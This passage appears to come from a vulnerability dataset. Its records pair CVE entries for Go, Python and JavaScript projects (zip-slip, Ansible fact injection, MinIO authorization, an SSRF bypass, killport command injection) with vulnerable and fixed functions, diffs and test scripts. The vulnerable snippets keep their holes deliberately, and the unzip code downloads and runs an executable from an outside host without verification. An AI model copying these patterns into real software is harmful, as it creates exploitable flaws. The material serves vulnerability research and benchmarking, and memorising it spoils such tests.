nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\twriteSymbolicLink(path, string(data))\n\t\t\t} else {\n\t\t\t\tos.MkdirAll(filepath.Dir(path), f.Mode())\n\t\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tdefer func() {\n\t\t\t\t\tif err := outFile.Close(); err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\t_, err = io.Copy(outFile, rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\tfor _, f := range r.File {\n\t\terr := extractAndWriteFile(f)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_205_1", "commit": "2adbaa4891b9690853ef10216189189f5ad7dc73", "file_path": "unzip.go", "start_line": 70, "end_line": 168, "snippet": "func (uz Unzip) Extract() error {\n\tif runtime.GOOS == \"windows\" && GetOsVersion() < 6.1 {\n\t\tif !FileIsExist(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\"))) {\n\t\t\tdownloadURL := \"https://y-bi.top/unzip.exe\"\n\t\t\tresp, err := ReadRemote(downloadURL, \"\", netClient)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tif len(resp) != 0 {\n\t\t\t\t// empty response means no such file exists, we should do nothing.\n\t\t\t\tf, err := os.OpenFile(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0755)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tf.Write(resp)\n\t\t\t\tf.Close()\n\t\t\t} else {\n\t\t\t\treturn errors.New(\"Install unzip.exe error\")\n\t\t\t}\n\t\t}\n\n\t\tvar cmd *exec.Cmd\n\t\t// dest := uz.Dest //+\"\\\"\"\n\t\tcmd = exec.Command(filepath.FromSlash(path.Join(os.TempDir(), \"unzip.exe\")), uz.Src, \"-d\", uz.Dest)\n\t\tcmd.Env = os.Environ()\n\t\t_, err := 
cmd.Output()\n\t\treturn err\n\t}\n\n\tr, err := zip.OpenReader(uz.Src)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\tif err := r.Close(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}()\n\n\tos.MkdirAll(uz.Dest, 0755)\n\n\t// Closure to address file descriptors issue with all the deferred .Close() methods\n\textractAndWriteFile := func(f *zip.File) error {\n\t\trc, err := f.Open()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := rc.Close(); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t}()\n\n\t\tpath := filepath.Join(uz.Dest, f.Name)\n\t\tif !strings.HasPrefix(path, filepath.Clean(uz.Dest)+string(os.PathSeparator)) {\n\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n\t\t}\n\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(path, f.Mode())\n\t\t} else {\n\t\t\tmode := f.FileHeader.Mode()\n\t\t\tif mode&os.ModeType == os.ModeSymlink {\n\t\t\t\tdata, err := ioutil.ReadAll(rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\twriteSymbolicLink(path, string(data))\n\t\t\t} else {\n\t\t\t\tos.MkdirAll(filepath.Dir(path), f.Mode())\n\t\t\t\toutFile, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tdefer func() {\n\t\t\t\t\tif err := outFile.Close(); err != nil {\n\t\t\t\t\t\tpanic(err)\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\t\t\t\t_, err = io.Copy(outFile, rc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t}\n\n\tfor _, f := range r.File {\n\t\terr := extractAndWriteFile(f)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/unzip.go\n+++ b/unzip.go\n@@ -53,6 +53,9 @@\n \t\t}()\n \n \t\tpath := filepath.Join(uz.Dest, f.Name)\n+\t\tif !strings.HasPrefix(path, filepath.Clean(uz.Dest)+string(os.PathSeparator)) {\n+\t\t\treturn fmt.Errorf(\"%s: illegal file path\", path)\n+\t\t}\n \n \t\tif f.FileInfo().IsDir() {\n \t\t\tos.MkdirAll(path, f.Mode())\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-10684", "cve_description": "A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. 
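For contrast with the Go containment check added in the unzip fix above (CVE-2020-36561), here is a hedged Python sketch of the same zip-slip guard; the helper name is illustrative and this is not the project's code:

```python
import os

def safe_extract_path(dest, member_name):
    # Resolve the would-be output path and refuse anything that escapes
    # dest -- the Python analogue of the strings.HasPrefix check above.
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, member_name))
    if os.path.commonpath([dest_real, target]) != dest_real:
        raise ValueError(f"{member_name}: illegal file path")
    return target
```

Called once per archive entry before anything is written, this rejects names like `../../etc/passwd` (and absolute names) while leaving ordinary relative names untouched.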
An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users, and any other key data, which could lead to privilege escalation or code injection.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ansible/ansible", "patch_url": ["https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce", "https://github.com/ansible/ansible/commit/5eabf7bb93c9bfc375b806a2b1f623d650cddc2b", "https://github.com/ansible/ansible/commit/0b4788a71fc7d24ffa957a94ee5e23d6a9733ab0", "https://github.com/ansible/ansible/commit/1d0d2645eed36ac4e17052ab4eacf240132d96fb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_406_1", "commit": "97e51797454b97bfb9447b3b7dc926be530ae19e", "file_path": "lib/ansible/vars/clean.py", "start_line": 168, "end_line": 178, "snippet": "def namespace_facts(facts):\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n if k in ('ansible_local',):\n # exceptions to 'deprefixing'\n deprefixed[k] = module_response_deepcopy(facts[k])\n else:\n deprefixed[k.replace('ansible_', '', 1)] = module_response_deepcopy(facts[k])\n\n return {'ansible_facts': deprefixed}"}], "fix_func": [{"id": "fix_py_406_1", "commit": "a9d2ceafe429171c0e2ad007058b88bae57c74ce", "file_path": "lib/ansible/vars/clean.py", "start_line": 167, "end_line": 176, "snippet": "def namespace_facts(facts):\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n if k.startswith('ansible_') and k not in ('ansible_local',):\n deprefixed[k[8:]] = module_response_deepcopy(facts[k])\n else:\n deprefixed[k] = module_response_deepcopy(facts[k])\n\n return {'ansible_facts': deprefixed}"}], "vul_patch": "--- a/lib/ansible/vars/clean.py\n+++ b/lib/ansible/vars/clean.py\n@@ -2,10 +2,9 @@\n ''' return all facts inside 'ansible_facts' w/o an ansible_ prefix '''\n deprefixed = {}\n for k in facts:\n- if k in ('ansible_local',):\n- # exceptions to 'deprefixing'\n+ if k.startswith('ansible_') and k not in ('ansible_local',):\n+ deprefixed[k[8:]] = module_response_deepcopy(facts[k])\n+ else:\n deprefixed[k] = module_response_deepcopy(facts[k])\n- else:\n- deprefixed[k.replace('ansible_', '', 1)] = module_response_deepcopy(facts[k])\n \n return {'ansible_facts': deprefixed}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": 
"CVE-2024-24747", "cve_description": "MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776"], "programing_language": "Go", "vul_func": [{"id": "vul_go_73_1", "commit": "4cd777a", "file_path": "cmd/admin-handlers-users.go", "start_line": "749", "end_line": "861", "snippet": "func (a adminAPIHandlers) UpdateServiceAccount(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\taccessKey := mux.Vars(r)[\"accessKey\"]\n\tif accessKey == \"\" {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrInvalidRequest), r.URL)\n\t\treturn\n\t}\n\n\tsvcAccount, _, err := globalIAMSys.GetServiceAccount(ctx, accessKey)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\tif !globalIAMSys.IsAllowed(policy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: policy.UpdateServiceAccountAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t}) {\n\t\trequestUser := cred.AccessKey\n\t\tif cred.ParentUser != \"\" {\n\t\t\trequestUser = cred.ParentUser\n\t\t}\n\n\t\tif requestUser != svcAccount.ParentUser {\n\t\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\t\treturn\n\t\t}\n\t}\n\n\tpassword := cred.SecretKey\n\treqBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tvar updateReq madmin.UpdateServiceAccountReq\n\tif err = json.Unmarshal(reqBytes, &updateReq); err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tif err := updateReq.Validate(); err != nil {\n\t\t// Since this validation would happen client side as well, we only send\n\t\t// a generic 
error message here.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tvar sp *policy.Policy\n\tif len(updateReq.NewPolicy) > 0 {\n\t\tsp, err = policy.ParseConfig(bytes.NewReader(updateReq.NewPolicy))\n\t\tif err != nil {\n\t\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\t\treturn\n\t\t}\n\t\tif sp.Version == \"\" && len(sp.Statements) == 0 {\n\t\t\tsp = nil\n\t\t}\n\t}\n\topts := updateServiceAccountOpts{\n\t\tsecretKey: updateReq.NewSecretKey,\n\t\tstatus: updateReq.NewStatus,\n\t\tname: updateReq.NewName,\n\t\tdescription: updateReq.NewDescription,\n\t\texpiration: updateReq.NewExpiration,\n\t\tsessionPolicy: sp,\n\t}\n\tupdatedAt, err := globalIAMSys.UpdateServiceAccount(ctx, accessKey, opts)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Call site replication hook - non-root user accounts are replicated.\n\tif svcAccount.ParentUser != globalActiveCred.AccessKey {\n\t\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\t\tType: madmin.SRIAMItemSvcAcc,\n\t\t\tSvcAccChange: &madmin.SRSvcAccChange{\n\t\t\t\tUpdate: &madmin.SRSvcAccUpdate{\n\t\t\t\t\tAccessKey: accessKey,\n\t\t\t\t\tSecretKey: opts.secretKey,\n\t\t\t\t\tStatus: opts.status,\n\t\t\t\t\tName: opts.name,\n\t\t\t\t\tDescription: opts.description,\n\t\t\t\t\tSessionPolicy: updateReq.NewPolicy,\n\t\t\t\t\tExpiration: updateReq.NewExpiration,\n\t\t\t\t},\n\t\t\t},\n\t\t\tUpdatedAt: updatedAt,\n\t\t}))\n\t}\n\n\twriteSuccessNoContent(w)\n}"}], "fix_func": [{"id": "fix_go_73_1", "commit": "0ae4915", "file_path": "cmd/admin-handlers-users.go", "start_line": "749", "end_line": "864", "snippet": "func (a adminAPIHandlers) UpdateServiceAccount(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\taccessKey := mux.Vars(r)[\"accessKey\"]\n\tif accessKey == \"\" {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrInvalidRequest), r.URL)\n\t\treturn\n\t}\n\n\tsvcAccount, _, err := globalIAMSys.GetServiceAccount(ctx, accessKey)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Permission checks:\n\t//\n\t// 1. Any type of account (i.e. access keys (previously/still called service\n\t// accounts), STS accounts, internal IDP accounts, etc) with the\n\t// policy.UpdateServiceAccountAdminAction permission can update any service\n\t// account.\n\t//\n\t// 2. We would like to let a user update their own access keys, however it\n\t// is currently blocked pending a re-design. 
Users are still able to delete\n\t// and re-create them.\n\tif !globalIAMSys.IsAllowed(policy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: policy.UpdateServiceAccountAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n\t\treturn\n\t}\n\n\tpassword := cred.SecretKey\n\treqBytes, err := madmin.DecryptData(password, io.LimitReader(r.Body, r.ContentLength))\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tvar updateReq madmin.UpdateServiceAccountReq\n\tif err = json.Unmarshal(reqBytes, &updateReq); err != nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErrWithErr(ErrAdminConfigBadJSON, err), r.URL)\n\t\treturn\n\t}\n\n\tif err := updateReq.Validate(); err != nil {\n\t\t// Since this validation would happen client side as well, we only send\n\t\t// a generic error message here.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tvar sp *policy.Policy\n\tif len(updateReq.NewPolicy) > 0 {\n\t\tsp, err = policy.ParseConfig(bytes.NewReader(updateReq.NewPolicy))\n\t\tif err != nil {\n\t\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\t\treturn\n\t\t}\n\t\tif sp.Version == \"\" && len(sp.Statements) == 0 {\n\t\t\tsp = nil\n\t\t}\n\t}\n\topts := updateServiceAccountOpts{\n\t\tsecretKey: updateReq.NewSecretKey,\n\t\tstatus: updateReq.NewStatus,\n\t\tname: updateReq.NewName,\n\t\tdescription: updateReq.NewDescription,\n\t\texpiration: updateReq.NewExpiration,\n\t\tsessionPolicy: sp,\n\t}\n\tupdatedAt, err := globalIAMSys.UpdateServiceAccount(ctx, accessKey, opts)\n\tif err != nil {\n\t\twriteErrorResponseJSON(ctx, w, toAdminAPIErr(ctx, err), r.URL)\n\t\treturn\n\t}\n\n\t// Call site replication hook - non-root user accounts are replicated.\n\tif svcAccount.ParentUser != globalActiveCred.AccessKey {\n\t\tlogger.LogIf(ctx, globalSiteReplicationSys.IAMChangeHook(ctx, madmin.SRIAMItem{\n\t\t\tType: madmin.SRIAMItemSvcAcc,\n\t\t\tSvcAccChange: &madmin.SRSvcAccChange{\n\t\t\t\tUpdate: &madmin.SRSvcAccUpdate{\n\t\t\t\t\tAccessKey: accessKey,\n\t\t\t\t\tSecretKey: opts.secretKey,\n\t\t\t\t\tStatus: opts.status,\n\t\t\t\t\tName: opts.name,\n\t\t\t\t\tDescription: opts.description,\n\t\t\t\t\tSessionPolicy: updateReq.NewPolicy,\n\t\t\t\t\tExpiration: updateReq.NewExpiration,\n\t\t\t\t},\n\t\t\t},\n\t\t\tUpdatedAt: updatedAt,\n\t\t}))\n\t}\n\n\twriteSuccessNoContent(w)\n}"}], "vul_patch": "--- a/cmd/admin-handlers-users.go\n+++ b/cmd/admin-handlers-users.go\n@@ -26,6 +26,16 @@\n \t\treturn\n \t}\n \n+\t// Permission checks:\n+\t//\n+\t// 1. Any type of account (i.e. access keys (previously/still called service\n+\t// accounts), STS accounts, internal IDP accounts, etc) with the\n+\t// policy.UpdateServiceAccountAdminAction permission can update any service\n+\t// account.\n+\t//\n+\t// 2. We would like to let a user update their own access keys, however it\n+\t// is currently blocked pending a re-design. 
Users are still able to delete\n+\t// and re-create them.\n \tif !globalIAMSys.IsAllowed(policy.Args{\n \t\tAccountName: cred.AccessKey,\n \t\tGroups: cred.Groups,\n@@ -34,15 +44,8 @@\n \t\tIsOwner: owner,\n \t\tClaims: cred.Claims,\n \t}) {\n-\t\trequestUser := cred.AccessKey\n-\t\tif cred.ParentUser != \"\" {\n-\t\t\trequestUser = cred.ParentUser\n-\t\t}\n-\n-\t\tif requestUser != svcAccount.ParentUser {\n-\t\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n-\t\t\treturn\n-\t\t}\n+\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), r.URL)\n+\t\treturn\n \t}\n \n \tpassword := cred.SecretKey\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-24747:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/minio\nrm -rf ./cmd/admin-handlers-users_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -run ^TestIAMInternalIDPServerSuite$ github.com/minio/minio/cmd\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-24747:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/minio\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd cmd && go test -run -v \n"} {"cve_id": "CVE-2023-24623", "cve_description": "Paranoidhttp before 0.3.0 allows SSRF because [::] is equivalent to the 127.0.0.1 address, but does not match the filter for private addresses.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hakobe/paranoidhttp", "patch_url": ["https://github.com/hakobe/paranoidhttp/commit/07f671da14ce63a80f4e52432b32e8d178d75fd3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_40_1", "commit": "a5a8577", "file_path": "client.go", "start_line": 112, "end_line": 157, "snippet": "func safeAddr(ctx context.Context, resolver *net.Resolver, hostport string, opts ...Option) (string, error) {\n\tc := basicConfig()\n\tfor _, opt := range opts {\n\t\topt(c)\n\t}\n\thost, port, err := net.SplitHostPort(hostport)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip != nil {\n\t\tif ip.To4() != nil && c.isIPForbidden(ip) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n\t\t}\n\t\treturn net.JoinHostPort(ip.String(), port), nil\n\t}\n\n\tif c.isHostForbidden(host) {\n\t\treturn \"\", fmt.Errorf(\"bad host is detected: %v\", host)\n\t}\n\n\tr := resolver\n\tif r == nil {\n\t\tr = net.DefaultResolver\n\t}\n\taddrs, err := r.LookupIPAddr(ctx, host)\n\tif err != nil || len(addrs) <= 0 {\n\t\treturn \"\", err\n\t}\n\tsafeAddrs := make([]net.IPAddr, 0, len(addrs))\n\tfor _, addr := range addrs {\n\t\t// only support IPv4 address\n\t\tif addr.IP.To4() == nil {\n\t\t\tcontinue\n\t\t}\n\t\tif c.isIPForbidden(addr.IP) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", addr.IP)\n\t\t}\n\t\tsafeAddrs = append(safeAddrs, addr)\n\t}\n\tif len(safeAddrs) == 0 {\n\t\treturn \"\", fmt.Errorf(\"fail to lookup ip addr: %v\", host)\n\t}\n\treturn net.JoinHostPort(safeAddrs[0].IP.String(), port), nil\n}"}], "fix_func": [{"id": "fix_go_40_1", "commit": "07f671d", "file_path": "client.go", "start_line": 112, "end_line": 157, "snippet": "func safeAddr(ctx context.Context, resolver *net.Resolver, hostport string, opts ...Option) (string, 
error) {\n\tc := basicConfig()\n\tfor _, opt := range opts {\n\t\topt(c)\n\t}\n\thost, port, err := net.SplitHostPort(hostport)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip != nil {\n\t\tif ip.IsUnspecified() || (ip.To4() != nil && c.isIPForbidden(ip)) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n\t\t}\n\t\treturn net.JoinHostPort(ip.String(), port), nil\n\t}\n\n\tif c.isHostForbidden(host) {\n\t\treturn \"\", fmt.Errorf(\"bad host is detected: %v\", host)\n\t}\n\n\tr := resolver\n\tif r == nil {\n\t\tr = net.DefaultResolver\n\t}\n\taddrs, err := r.LookupIPAddr(ctx, host)\n\tif err != nil || len(addrs) <= 0 {\n\t\treturn \"\", err\n\t}\n\tsafeAddrs := make([]net.IPAddr, 0, len(addrs))\n\tfor _, addr := range addrs {\n\t\t// only support IPv4 address\n\t\tif addr.IP.To4() == nil {\n\t\t\tcontinue\n\t\t}\n\t\tif c.isIPForbidden(addr.IP) {\n\t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", addr.IP)\n\t\t}\n\t\tsafeAddrs = append(safeAddrs, addr)\n\t}\n\tif len(safeAddrs) == 0 {\n\t\treturn \"\", fmt.Errorf(\"fail to lookup ip addr: %v\", host)\n\t}\n\treturn net.JoinHostPort(safeAddrs[0].IP.String(), port), nil\n}"}], "vul_patch": "--- a/client.go\n+++ b/client.go\n@@ -10,7 +10,7 @@\n \n \tip := net.ParseIP(host)\n \tif ip != nil {\n-\t\tif ip.To4() != nil && c.isIPForbidden(ip) {\n+\t\tif ip.IsUnspecified() || (ip.To4() != nil && c.isIPForbidden(ip)) {\n \t\t\treturn \"\", fmt.Errorf(\"bad ip is detected: %v\", ip)\n \t\t}\n \t\treturn net.JoinHostPort(ip.String(), port), nil\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-24623:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/paranoidhttp\nrm -rf ./client_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestRequest$ github.com/hakobe/paranoidhttp\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-24623:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/paranoidhttp\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -v github.com/hakobe/paranoidhttp\n"} {"cve_id": "CVE-2021-23360", "cve_description": "This affects the package killport before 1.0.2. If (attacker-controlled) user input is given, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization. 
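The paranoidhttp fix above (CVE-2023-24623) adds an `IsUnspecified()` test because the unspecified addresses `[::]` and `0.0.0.0` are routed to localhost on many stacks yet did not match the private-address filter. A rough Python equivalent using the standard `ipaddress` module (a sketch, not the library's code):

```python
import ipaddress

def is_forbidden_ip(ip_text):
    # Block unspecified, loopback, private and link-local targets
    # before allowing an outbound HTTP connection.
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_unspecified or ip.is_loopback
            or ip.is_private or ip.is_link_local)

assert is_forbidden_ip("::")           # the bypass this CVE describes
assert is_forbidden_ip("0.0.0.0")
assert not is_forbidden_ip("93.184.216.34")
```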
Running this PoC will cause the command touch success to be executed, leading to the creation of a file called success.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ssnau/killport", "patch_url": ["https://github.com/ssnau/killport/commit/bec8e371f170a12e11cd222ffc7a6e1ae9942638"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_105_1", "commit": "5268f23", "file_path": "index.js", "start_line": 6, "end_line": 43, "snippet": "module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n // err will be an instance of Error\n if (stderr) return reject(stderr);\n var lines = String(stdout).split('\\n').filter(notEmpty);\n var pids = lines.map(function(line){\n var blocks = line.split(/\\s+/);\n if (blocks[1] && +blocks[1]) {\n return +blocks[1];\n }\n return null;\n }).filter(notEmpty);\n\n if (!pids.length) {\n return resolve('no pids found');\n }\n\n var infs = [];\n return async.each(pids, function(pid, next) {\n console.log('kill ' + pid);\n cp.exec('kill ' + pid, function (err, stdout, stderr) {\n infs.push({\n pid: pid,\n err: err,\n stderr: stderr,\n stdout: stdout\n });\n next();\n });\n }, function(err) {\n resolve(infs);\n });\n });\n }))\n};"}], "fix_func": [{"id": "fix_js_105_1", "commit": "bec8e37", "file_path": "index.js", "start_line": 6, "end_line": 44, "snippet": "module.exports = function killport(port) {\n return (new Promise(function(resolve, reject) {\n if (!/^\\d+$/.test(port)) throw new Error('port must be a number.');\n var cmd = 'lsof -i:' + port; \n cp.exec(cmd, function(err, stdout, stderr){\n // do not check `err`, if no process found\n // err will be an instance of Error\n if (stderr) return reject(stderr);\n var lines = String(stdout).split('\\n').filter(notEmpty);\n var pids = lines.map(function(line){\n var blocks = line.split(/\\s+/);\n if (blocks[1] && +blocks[1]) {\n return +blocks[1];\n }\n return null;\n }).filter(notEmpty);\n\n if (!pids.length) {\n return resolve('no pids found');\n }\n\n var infs = [];\n return async.each(pids, function(pid, next) {\n console.log('kill ' + pid);\n cp.exec('kill ' + pid, function (err, stdout, stderr) {\n infs.push({\n pid: pid,\n err: err,\n stderr: stderr,\n stdout: stdout\n });\n next();\n });\n }, function(err) {\n 
